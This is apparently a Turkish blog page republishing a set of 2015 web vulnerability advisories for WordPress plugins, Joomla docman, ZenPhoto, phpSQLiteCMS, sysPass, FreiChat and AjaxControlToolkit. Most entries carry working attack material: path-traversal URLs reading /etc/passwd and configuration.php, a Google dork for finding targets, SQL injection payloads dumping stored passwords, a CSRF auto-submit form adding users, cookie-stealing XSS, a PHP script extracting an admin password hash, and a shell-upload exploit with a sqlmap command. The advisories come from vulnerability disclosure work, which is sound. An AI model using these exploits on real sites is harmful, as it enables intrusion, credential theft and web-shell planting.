-
14 Temmuz 2015 Salı
WordPress Image Export 1.1 Arbitrary File Download 




Title: Remote file download vulnerability in Wordpress Plugin image-export v1.1
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-01
Download Site: https://wordpress.org/plugins/image-export
Vendor: www.1efthander.com
Vendor Notified: 2015-07-05
Vendor Contact: https://twitter.com/1eftHander
Description: Image Export plugin can help you selectively download images uploaded by an administrator .
Vulnerability:
The code in file download.php doesn't do any checking that the user is requesting files from the uploaded images directory only.  And line 8 attempts to
unlink the file after being downloaded.  This script could be used to delete files out of the wordpress directory if file permissions allow.
 
      1 <?php
      2 if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) {
      3         $file = $_GET['file'];
      4 
      5         header( 'Content-Type: application/zip' );
      6         header( 'Content-Disposition: attachment; filename="' . $file . '"' );
      7         readfile( $file );
      8         unlink( $file );
      9         
     10         exit;
     11 }
     12 ?>
CVEID: TBD
Exploit Code:
  • $ curl http://example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd
Screen Shots:
Advisory: http://www.vapid.dhs.org/advisory.php?v=135
DEVAMINI OKU..
Joomla com_docman Full Path Disclosure & Local File Disclosure/Include





# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)
# CWE: CWE-200(FPD) CWE-98(LFI/LFD)
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 13/07/2015
# Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
# Google Dork: inurl:"/components/com_docman/dl2.php"


Google Dork :  inurl:"/components/com_docman/dl2.php"

# Xp
loit (FPD):

Get one target and just download with blank parameter:
http://www.site.com/components/com_docman/dl2.php?archive=0&file=

In title will occur Full Path Disclosure of server.

# Xploit (LFD/LFI):

http://www.site.com/components/com_docman/dl2.php?archive=0&file=[LDF]

Let's Xploit...

First we need use Xploit FPD to see the path of target, after that we'll Insert 'configuration.php' configuration database file and encode in Base64:

../../../../../../../target/www/configuration.php <= Not Ready

http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA== <= Ready !

And Now we have a configuration file...
DEVAMINI OKU..
ZenPhoto 1.4.8 XSS / SQL Injection / Traversal 



Vulnerability: SQL Injection, Reflected XSS, Path Traversal
Affected Software: ZenPhoto (http://www.zenphoto.org/)
Affected Version: 1.4.8 (probably also prior versions)
Patched Version: 1.4.9
Risk: Medium
Vendor Contacted: 2015-05-18
Vendor Fix: 2015-07-09
Public Disclosure: 2015-07-10

SQL Injection
=============

  There are multiple second order error based SQL injections into the
ORDER BY keyword in the admin area.

   - visit zp-core/admin-options.php?saved&tab=gallery
     alternatively visit zp-core/admin-options.php?saved&tab=image
   - Set "Sort gallery by" to "Custom"
   - set custom fields to "id,extractvalue(0x0a,concat(0x0a,(select
version())))%23"
   - visit zp-core/admin-upload.php?page=upload&tab=http&type=images
   - alternatively, visiting either of these will also trigger the injection:
    /
    zp-core/admin-edit.php
    zp-core/admin-users.php?page=users
    zp-core/admin-themes.php

  The result is only directly displayed if the server is configured to
report errors, but it can also be seen in the logfile located at
zp-core/admin-logs.php?page=logs

XSS 1
=====

  http://localhost/zenphoto-zenphoto-1.4.8/zp-core/admin-upload.php?error=%26lt%3Bscript%26gt%3Balert(1)%26lt%3B%2Fscript%26gt%3B
  http://localhost/zenphoto-zenphoto-1.4.8/zp-core/utilities/backup_restore.php?compression=%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B

    The payload must first be HTML entity-encoded, and then URL encoded.

XSS 2
=====


http://localhost/zenphoto-security-fixes/zp-core/admin.php?action=external&error="
onmouseover="alert('xsstest')" foo="bar&msg=hover over me!

Directory Traversal
===================

  For an admin, it is possible to view and edit any PHP or inc files, not
just the ones inside the theme directory.

  http://localhost/zenphoto-zenphoto-1.4.8/zp-core/admin-themes-editor.php?theme=../../../../../var/www&file=secret.php


Execute Function
================

An admin user can execute any function they want via this URL (there is
no CSRF protection for it):

    localhost/zenphoto-security-fixes/zp-core/admin.php?action=phpinfo

This gives up some control over the control flow of the site, which
might cause problems, especially considering the missing of CSRF protection.

Source
======

http://software-talk.org/blog/2015/07/second-order-sql-injection-reflected-xss-path-traversal-function-execution-vulnerability-zenphoto/
DEVAMINI OKU..
phpSQLiteCMS CSRF / XSS / Privilege Escalation / File Upload 



[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-PHPSQLITECMS0712.txt



Vendor:
================================
phpsqlitecms.net



Product:
================================
ilosuna-phpsqlitecms-d9b8219


Advisory Information:
==============================================================================
CSRF, Unrestricted File type upload, Privilege escalation & XSS
Vulnerabilities.
User will be affected if they visit a malicious website or click any
infected link.
Possibly resulting in malicious attackers taking control of the Admin / CMS
area.


Vulnerability Details:
=====================

CSRF:
-----
We can add arbitrary users to the system, delete arbitrary web server files
and escalate privileges, as no CSRF token is present.

Add arbitrary user:
-------------------
The following request variables are all that is needed to add users to
system.
mode = users
new_user_submitted = true
name = "hyp3rlinx"
pw = "12345"
pw_r = "12345"


Privilege escalation:
---------------------
Under users area in admin we can easily gain admin privileges, again using
CSRF vulnerability we
submit form using our id and change request variable to type '1' granting
us admin privileges.

e.g.

mode:users
edit_user_submitted:true
id:3
name:hyp3rlinx
new_pw:
new_pw_r:
type:1   <------make us admin


Delete aribitrary files:
------------------------
The following request parameters are all we is need to delete files from
media or files directorys
under the web servers CMS area.

mode=filemanager
directory=files
delete=index.html
confirmed=true


XSS:
-----
We can steal PHP session cookie via XSS vulnerability


Unrestricted File Type Upload:
------------------------------
The files & media dirs will happily take .PHP, .EXE etc... and PHP scripts
when selected will execute
whatever PHP script we upload.


Exploit code(s):
===============

1- CSRF POC Add arbitrary users to the system.
---------------------------------------------

<script>
function doit(){
var e=document.getElementById('evil')
e.submit()
}
</script>
</head>

<body onLoad="doit()">
<form id="evil" action="
http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php"
method="post">
<input type="text" name="mode" value="users"/>
<input type="text" name="new_user_submitted" value="true"/>
<input type="text" name="name" value="hyp3rlinx" />
<input type="text" name="pw" value="abc123" />
<input type="text" name="pw_r" value="abc123" />
</form>


2- CSRF privilege escalation POST URL:
--------------------------------------
http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php


Privilege escalation request string:
------------------------------------
mode=users&edit_user_submitted=true&id=3&name=hyp3rlinx&new_pw=&new_pw_r=&type=1


3- CSRF Delete Aribitary Server Files:
--------------------------------------
Below request URL will delete the index.html file in files dir on web
server without any type
of request validation CSRF token etc.


http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php?mode=filemanager
&directory=files&delete=index.html&confirmed=true


XSS steal PHP session ID POC:
-----------------------------
http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php?mode=comments&type=0&
edit=49&comment_id="/><script>alert('XSS by hyp3rlinx
'%2bdocument.cookie)</script>&page=1


Disclosure Timeline:
=========================================================


Vendor Notification:  NA
July 12, 2015  : Public Disclosure



Severity Level:
=========================================================
High



Description:
==========================================================


Request Method(s):             [+] POST & GET


Vulnerable Product:              [+] ilosuna-phpsqlitecms-d9b8219


Vulnerable Parameter(s):      [+] comment_id, delete, type,
new_user_submitted


Affected Area(s):                  [+] Admin & CMS


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.


(hyp3rlinx)
DEVAMINI OKU..
sysPass 1.0.9 SQL Injection 



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2015-031
Product: sysPass
Vendor: http://cygnux.org/
Affected Version(s): 1.0.9 and below
Tested Version(s): 1.0.9
Vulnerability Type: SQL Injection (CWE-89)  
Risk Level: High
Solution Status: Fixed
Vendor Notification: 2014-07-27
Solution Date: 2014-08-04
Public Disclosure: 2015-07-13
CVE Reference: Not yet assigned
Author of Advisory: Daniele Salaris (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

sysPass is an web based Password Manager written in PHP and Ajax with a
built-in multiuser environment.

An SQL injection vulnerability could be identified in one of the requests
of this web password manager.

The software manufacturer describes the web application as follows
(see [1]):

"sysPass is a web password manager written in PHP that allows the
password management in a centralized way and in a multiuser environment.
The main features are:

* HTML5 and Ajax based interface
* Password encryption with AES-256 CBC.
* Users and groups management.
* Advanced profiles management with 16 access levels.
* MySQL, OpenLDAP and Active Directory authentication.
* Activity alerts by email.
* Accounts change history.
* Accounts files management.
* Inline image preview.
* Multilanguage.
* Links to external Wiki.
* Portable backup.
* Action tracking and event log.
* One-step install process."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The SQL injection vulnerability was found in an HTTP post request of the
AJAX component from the sysPass software.

The attribute getAccounts is not correctly sanitized and therefore can be
abused to inject arbitrary SQL statements.

This SQL injection vulnerability can be exploited by an authenticated
attacker by sending a specially crafted HTTP POST request (see PoC 
section).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following HTTP request can be used to extract information from the
database:

POST /sysPass-1.0.9/ajax/ajax_search.php HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<HOST>/sysPass-1.0.9/index.php
Content-Length: 249
Cookie: PHPSESSID=<SESSIONID>
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search=getAccounts') UNION ALL SELECT NULL,NULL,account_name,account_login,account_pass,account_url,NULL,NULL,NULL,NULL,NULL from accounts -- &start=0&skey=1&sorder=1&sk=081bad3198bdb3cd29133befc57d60287541663b&is_ajax=1&customer=0&category=0&rpp=10


The server answers as followed:

HTTP/1.1 200 OK
Date: Fri, 10 Jul 2015 14:06:04 GMT
Server: Apache/2.4.12 (Unix) PHP/5.6.10
X-Powered-By: PHP/5.6.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=<SESSIONID>; path=/; HttpOnly
Content-Length: 1147
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div id="data-search-header" class="data-header"><ul class="round header-grey"><li class="header-txt"><a onClick="searchSort(5,0)" 
title="Sort by Customer" >Customer</a></li><li class="header-txt"><a onClick="searchSort(1,0)" title="Sort by Name">Name</a><img 
src="imgs/sort_desc.png" class="icon" /></li><li class="header-txt"><a onClick="searchSort(2,0)" title="Sort by Category">Category</a></li><li 
class="header-txt"><a onClick="searchSort(3,0)" title="Sort by Username">User</a></li><li class="header-txt"><a onClick="searchSort(4,0)" 
title="Sort by URL / IP">URL / IP</a></li></ul></div><div id="data-search" class="data-rows"><ul><li class="cell-txt txtCliente"></li><li 
class="cell-txt">TEST_USER</li><li class="cell-txt">TEST_NAME</li><li class="cell-txt"><DATA></li><li 
class="cell-txt">TEST_URL</li><li class="cell-img"><img src="imgs/btn_group.png" title="Groups:<br><br>*<br>" /></li><li 
class="cell-actions round"></li></ul></div><div id="pageNav" class="round shadow"><div id="pageNavLeft">1 @ 0.00478 s 
<span id="txtFilterOn" class="round">Filter ON</span></div><div id="pageNavRight">&nbsp; 1 / 1 &nbsp;</div></div>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update sysPass to the latest software version.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2014-07-27: Vulnerability discovered
2014-07-27: Vulnerability reported to vendor
2014-08-04: Vendor releases new fixed version of sysPass 
2015-07-13: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Web site of sysPass - sysadmin password manager
    http://wiki.syspass.org/en/start
[2] SySS Security Advisory SYSS-2015-031
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-031.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Daniele Salaris of the SySS GmbH.

E-Mail: disclosure (at) syss.de
Key fingerprint = E135 4E23 6091 A85C 9E14 577A 28DF B3A7 0A98 A9D4

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may 
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web 
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQIcBAEBCgAGBQJVo3V1AAoJECjfs6cKmKnUUgQQALxneKA1L6DQmcqbCf5X1ji1
UGoSwkpdsvfMAJOeQ5IlpLKd1hYWl3NkeheD74nBZ0YoNjLc9I3uSh1u0Xi25kRu
xI6RTgWNtroHRYeVN8v2qPFiABXKUxc9zdsEVNLz2PNNU4mbmzaeszrrK3XU7Z/+
dMjGvAr7b+qWMD3N+l5zSqrh4KMpnmu6XAJSKJM3az6FECsdXFKF7w2DlAr39vrP
cCkXrN9ekSkEN2wuvh8O3kGQ7T9hsxHCsSGwclb4gUqAVQ4aLcoL782HQulhW3/J
sMWm3s7PLo0Q10RMhdoJgGKCZfAbn9L2HfjuvXO4YznEjjp/bTwLw3DIGqNSmF3q
aqFbFZxxgW45JIV9sIfa+A17Q8DZAdsZNLoEOTcznBd9S46qn/ohWhZVOIypof8y
J3hVMlYYTL52kKEDR2QlVwsNzmfeyE3bmTkUjJD8STz/stQi2shDXQhFe3uJKMna
gtYh/US+GbWtPvll0NLOlNT9kG+Eytsuj5dgdwMZ82JV3wCyEL6IgbhXpAAAlt9Y
UQ4Zv6kNLJt2XF3Sws+DXtp5S0bdE5MrKJSa9zUjj38+YmCg+TMMRIgs6U2YGnlk
JHOrIUZzveTTZ0AXIE/HXFGWnuMOEPjoZBh97y9xdUSej3Wo+knjUrarVfv8PCaG
GBBy6/A3qHLaOsoxWX0i
=ZrwB
-----END PGP SIGNATURE-----
DEVAMINI OKU..
FreiChat 9.6 SQL Injection 




# Exploit Title: FreiChat 9.6 SQL Injection
# Date: 27-11-2014
# Software Link: http://codologic.com/page/freichat-free-php-chat-script-software
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps

1. Description
  
$_GET['time'] is not escaped.

File: freichat\server\plugins\chatroom\chatroom.php

$get_mesg = $this->get_messages($_GET['time']);
public function get_messages($time) {

    $frm_id = $this->frm_id;
    $result = array();

    if ($time == 0) {
    //$get_mesg_query = "SELECT DISTINCT * FROM frei_chat WHERE frei_chat.\"to\"=" . $frm_id . "AND time<2 order by time";
    } else {
        $get_mesg_query = "SELECT * FROM frei_chat WHERE frei_chat.\"to\"=" . $frm_id . " AND time>" . $time . " AND message_type<>1 order by time ";
        $result = $this->db->query($get_mesg_query)->fetchAll();
    }


    return $result;
}

http://security.szurek.pl/freichat-96-sql-injection.html

2. Proof of Concept

Example for WordPress integration (it will give you admin password):

<?php
/*
 * Kacper Szurek
 * http://security.szurek.pl
 */
function hack($url, $cookie, $sql ){

$ckfile = dirname(__FILE__) . $cookie;
$cookie = fopen($ckfile, 'w') or die("Cannot create cookie file");

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$content = curl_exec($ch);

if (preg_match('|http://(.*?)/freichat/client/main\.php\?id=([a-zA-Z0-9]+)&xhash=([a-zA-Z0-9]+)|i', $content, $matches)) {
    curl_setopt($ch, CURLOPT_URL, 'http://'.$matches[1].'/freichat/server/freichat.php?freimode=getmembers&id='.$matches[2].'&xhash='.$matches[3]);
    $content = curl_exec($ch);

    curl_setopt($ch, CURLOPT_URL, 'http://'.$matches[1].'/freichat/server/freichat.php?freimode=loadchatroom&id='.$matches[2].'&xhash='.$matches[3].'&in_room=1&chatroom_mesg_time=1&custom_mesg=1&time='.urlencode($sql));

    $content = curl_exec($ch);

    if (preg_match('|"room_id":"([^"]+)"|', $content, $output)) {
        echo "WordPress password user ID=1: ".$output[1];
    } else {
        echo "FAIL";
    }
}

curl_close( $ch );
}

// URL to WordPress main URL
$url = "http://wp/";

// SQL Payload
$sql = "1 UNION SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, user_pass FROM wp_users WHERE ID=1 -- ";

$cookie = "/cookie.txt";

hack($url, $cookie, $sql);
DEVAMINI OKU..
AjaxControlToolkit File Upload Directory Traversal 



The AjaxControlToolkit prior to version 15.1 has a file upload directory
traversal vulnerability which on a poorly configured web server can lead to
remote code execution.

The issue affects any application using the AjaxFileUpload control. The
vulnerability arises because the =E2=80=9CfileId=E2=80=9D is not validated =
and can be
altered by the user to contain directory traversal characters (\..\..\..\)
allowing an attacker to write the uploaded file to any location on the file
system that the web server=E2=80=99s file permissions allow.

The "fileid" parameter is passed when uploading files. Intercepting the
request and modifying the value of "fileid" to a directory path will result
in the file being uploaded to be placed in the location on the remote
server as long as file system permissions allow. If an attacker is capable
of writing an arbitrary file to the server's web directory then remote code
execution is possible. A demonstration of this is written here:
http://www.cardinaleconcepts.com/cve-2015-4670-directory-traversal-to-remot= <http://www.cardinaleconcepts.com/cve-2015-4670-directory-traversal-to-remot=>
e-code-execution-in-ajaxcontroltoolkit/

This issue has been reported to the vendor and an updated version of the
library has been made available.

CVE Number: CVE-2015-4670

Discovered by: Brian Cardinale

Write Up:
http://www.cardinaleconcepts.com/cve-2015-4670-directory-traversal-to-remot= <http://www.cardinaleconcepts.com/cve-2015-4670-directory-traversal-to-remot=>
e-code-execution-in-ajaxcontroltoolkit/

Sample Vuln App: https://bitbucket.org/bcardinale/cve-2015-4670-vuln-app/sr= <https://bitbucket.org/bcardinale/cve-2015-4670-vuln-app/sr=>
c
Affected Versions:

* 7.1213.0
* 7.1005.0
* 7.1002.0
* 7.930.0
* 7.725.0
* 7.607.0
* 7.429.0
DEVAMINI OKU..
WordPress WP-PowerPlayGallery 3.3 File Upload / SQL Injection 





Title: Remote file upload vulnerability & SQLi in wordpress plugin wp-powerplaygallery v3.3
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-27
Download Site: https://wordpress.org/plugins/wp-powerplaygallery
Vendor: WP SlideShow
Vendor Notified: 2015-06-29
Advisory: http://www.vapid.dhs.org/advisory.php?v=132
Vendor Contact: plugins@wordpress.org
Description: This is the best gallery for touch screens. It is fully touch enabled with great features. This gallery is compatible wiht iphone and ipads. It is also allow us to use it as a widget.You can also enable this Powerplay Gallery on your wordpress site by placing code snippet in your template (.php) files. It shows flash gallery for desktops and touch enabled version for ipad and iphones.
Vulnerability:
1. Ability to create directories out side of the upload path by using ../:
Lines 56-59 of upload.php:

56 // Create target dir
57 if (!file_exists($targetDir)) {
58         @mkdir($targetDir);
59 }      

2. Arbitrary file uploads to a path in the web root directory:
Lines 138-160 of uploads.php don’t verify what types of files are allowed or where they should be placed:

138 // Open temp file
139 if (!$out = @fopen("{$filePath}.part", $chunks ? "ab" : "wb")) {
140         die('{"jsonrpc" : "2.0", "error" : {"code": 102, "message": "Failed to open output stream."}, "id" :     "id"}');
141 }
142 
143 if (!empty($_FILES)) {
144         if ($_FILES["file"]["error"] || !is_uploaded_file($_FILES["file"]["tmp_name"])) {
145                 die('{"jsonrpc" : "2.0", "error" : {"code": 103, "message": "Failed to move uploaded file."}    , "id" : "id"}');
146         }
147 
148         // Read binary input stream and append it to temp file
149         if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) {
150                 die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."},     "id" : "id"}');
151         }
152 } else {
153         if (!$in = @fopen("php://input", "rb")) {
154                 die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."},     "id" : "id"}');
155         }
156 }
157 
158 while ($buff = fread($in, 4096)) {
159         fwrite($out, $buff);
160 }

3. Sql injection 
Lines 131-135 of upload.php fail to handle user input appropriately either by sanitizing or paramaterizing it. Injection points are
any GET/POST to albumid or name.

131 $query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, `description`, `price`, `thumb`, `    image`, `status`, `order`, `creation_date` )
132           VALUES (".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."','".$_REQUEST    ['name']."',1,'','NULL')";
133 
134           $wpdb->query($query);
135 

CVEID:
OSVDB:
Exploit Code:
  • <?php
  • /*Remote shell upload exploit for wp-powerplaygallery v3.3 */
  • /*Larry W. Cashdollar @_larry0
  • 6/27/2015
  • albumid needs to be a numeric value matching an existing album number, 1 is probably a good start
  • but you can enumerate these by using curl, and looking for redirect 301 responses:
  • e.g. $ curl http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big
  • ->301 exists else 404 doesn't.
  • shell is http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big/shell.php
  • */
  •  
  •  
  •   $target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php';
  •   $file_name_with_full_path = '/var/www/shell.php';
  •  
  •         echo "POST to $target_url $file_name_with_full_path";
  •   $post = array('albumid'=>'foo' , 'name' => 'shell.php','file'=>'@'.$file_name_with_full_path);
  •  
  •         $ch = curl_init();
  •   curl_setopt($ch, CURLOPT_URL,$target_url);
  •   curl_setopt($ch, CURLOPT_POST,1);
  •   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  •         curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  •   $result=curl_exec ($ch);
  •   curl_close ($ch);
  •         echo "<hr>";
  •   echo $result;
  •         echo "<hr>";
  • ?>
SQLi PoC:
$ sqlmap -u http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php --data "albumid=1”  —dbms mysql
DEVAMINI OKU..
Kaydol: Yorumlar ( Atom )